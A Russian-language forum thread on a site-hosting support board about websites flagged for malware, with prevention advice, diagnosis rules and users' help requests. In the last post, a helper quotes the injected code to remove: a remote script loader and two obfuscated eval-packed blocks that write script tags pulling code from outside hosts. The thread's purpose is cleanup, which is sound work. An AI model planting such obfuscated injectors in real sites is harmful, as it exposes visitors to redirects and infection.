Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    ирина28
    Сообщений: 7
    Репутация: 2

    Сообщение # 1456 | 19:36:00
    Здравствуйте, проверьте, пожалуйста, мой сайт http://www.lubimoe-rukodelie.com/forum/

    проблема обнаруживается и под логином, и под гостем тоже

    пыталась загружать через браузеры: Opera и Yandex

    Yandex при загрузке сайта появляется сообщение: Сайт www.lubimoe-rukodelie.com
    может угрожать безопасности вашего компьютера. По нашим данным, на страницах сайта был размещён вредоносный программный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.

    Opera - Этот сайт занесен в черный список как подозрительный или мошеннический
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1457 | 19:47:38
    ирина28, вы очищали сайт или предпринимали какие-либо действия для исправления проблемы?
    уберите с сайта ссылку на ваших друзей и спонсоров

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ирина28
    Сообщений: 7
    Репутация: 2

    Сообщение # 1458 | 19:48:46
    webanet, я убрала ссылки.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1459 | 19:50:29
    ирина28, какие ссылки вы убрали?

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ирина28
    Сообщений: 7
    Репутация: 2

    Сообщение # 1460 | 19:51:57
    ссылки на сайты друзей
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1461 | 19:55:02
    ирина28, теперь удалите из блока наши друзья и спонсоры последнюю ссылку на МА-КО Dimensions и отправьте сайт на пересмотр через вебмастер

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ирина28
    Сообщений: 7
    Репутация: 2

    Сообщение # 1462 | 20:08:59
    на вебмастере приняли заявку на проверку:
    07.08.2014 оставлена заявка на проверку сайта, она займет несколько дней.

    также там висит сообщение:

    Дата последней проверкиСтраницаВердикт02.08.2014http://www.lubimoe-rukodelie.com/Troj/JSRedir-NG
    ирина28
    Сообщений: 7
    Репутация: 2

    Сообщение # 1463 | 21:53:31
    webanet, спасибо большое за помощь!
    Перепроверка прошла успешно.. Сайт убрали из черного списка ))))
    admin3129
    Сообщений: 1
    Репутация: 0

    Сообщение # 1464 | 23:03:30
    Цитата admin3129 ()
    Здравствуйте! Помогите пожалуйста! Мой сайт http://dengibydyt.ucoz.ru. При переходе с поисковиков или по внутренним ссылкам происходит редирект на страницуhttp://mobi-mall.club/?action=NEW&statusCode=3&hash=08dd537660ded98646f9851911b0ff1a

    Сайт 2ip показал, что "на сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код".

    Как его удалить, помогите пожалуйста?!

    1) сайт http://dengibydyt.ucoz.ru
    2) проблема обнаруживается только под гостем (под логином не обнаруживается, так как редирект работает только при первом клике на сайте)
    3) антивирус не реагирует
    4) браузер не блокирует

    Добавлено (07 Авг 2014, 23:03:30)
    ---------------------------------------------
    webanet, помогите, пожалуйста!

    ирина28
    Сообщений: 7
    Репутация: 2

    Сообщение # 1465 | 19:38:30
    Ничего не понимаю... Опять при загрузке сайта всплывает предупреждение:...

    Сайт www.lubimoe-rukodelie.com
    может угрожать безопасности вашего компьютера.По нашим данным, на страницах сайта был размещён вредоносный программный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.Более подробную информацию об угрозе или безопасную копию сайта можно посмотреть на (ссылка)
    Помогите, пожалуйста, решить проблему...
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1466 | 19:44:28
    ирина28, вам надо написать в тех.поддержку яндекса и описать ситуацию. зайдите в вебмастер и напишите им

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1467 | 22:11:05
    fil0649, ваш сайт не находится в системе юкоз. за помощью по своему вопросу обратитесь к вашему хостеру

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    fil0649
    Сообщений: 1
    Репутация: 2

    Сообщение # 1468 | 22:16:30
    ок. спасибо и на этом
    Dima2335
    Сообщений: 5
    Репутация: 2

    Сообщение # 1469 | 12:25:01
    Добрый день! 12.08.2014 г. пришло сообщение такого плана в яндекс вебмастере :
    На страницах сайта diminex.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, порче или краже данных.
    В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».
    Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев.
    Пожалуйста, удалите вредоносный код. Если при новой проверке код не будет обнаружен, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.
    Результат выборочной проверки
    Дата последней проверки
    Страница
    http://diminex.ru/load/proekty/proekty_kottedzhej/57
    Вердикт поведенческий анализ
    От Гугла пришло сообщение такого плана:
    Google не удалось получить доступ к сайту из-за ошибки DNS

    Жду ответа. С уважением
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1470 | 16:27:56
    Dima2335, удалите это

    Код
    <script type="text/javascript">(function(){var j=27740,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("src","http://c.luxup.ru/t/lb"+j+".js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script>
    <script type='text/javascript' language='javascript'>
    <!--
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1=\'b://a\'+\'d\'+\'s\'+\'i\'+\'e.9\'+\'g\'+\'8.4/3/?5=6\';7.f("<n"+"0 h"+"p"+"u=\'q"+"r"+"2\' t"+"v=\'t"+"o/j"+"k"+"0\' l"+"c=\'"+1+"\'></m"+"2>");',32,32,'ript|xt526|ipt|pnrpEK1957|net|sid|116296|document|hka|okos|di|http||mu|k2010|write|hec|la||jav|asc|sr|scr|sc|ext|ngua|ja|vascr|||ge |ype'.split('|'),0,{}))
    // -->
    </script><script type='text/javascript' language='javascript'>
    <!--
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2=\'b://a\'+\'d.\'+\'e\'+\'s\'+\'9\'+\'g\'+\'.8/3/?4=5\';6.7("<f"+"0 m"+"h"+"o=\'p"+"q"+"1\' t"+"r=\'t"+"n/i"+"j"+"0\' k"+"c=\'"+2+"\'></l"+"1>");',30,30,'ript|ipt|BI957|cxnOYg2199|sid|116296|document|write|net|hech|dimusik|http||2010|oko|sc|ka|ngua|jav|asc|sr|scr|la|ext|ge|ja|vascr|yp e||'.split('|'),0,{}))
    // -->
    и проблем не будет

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Поиск: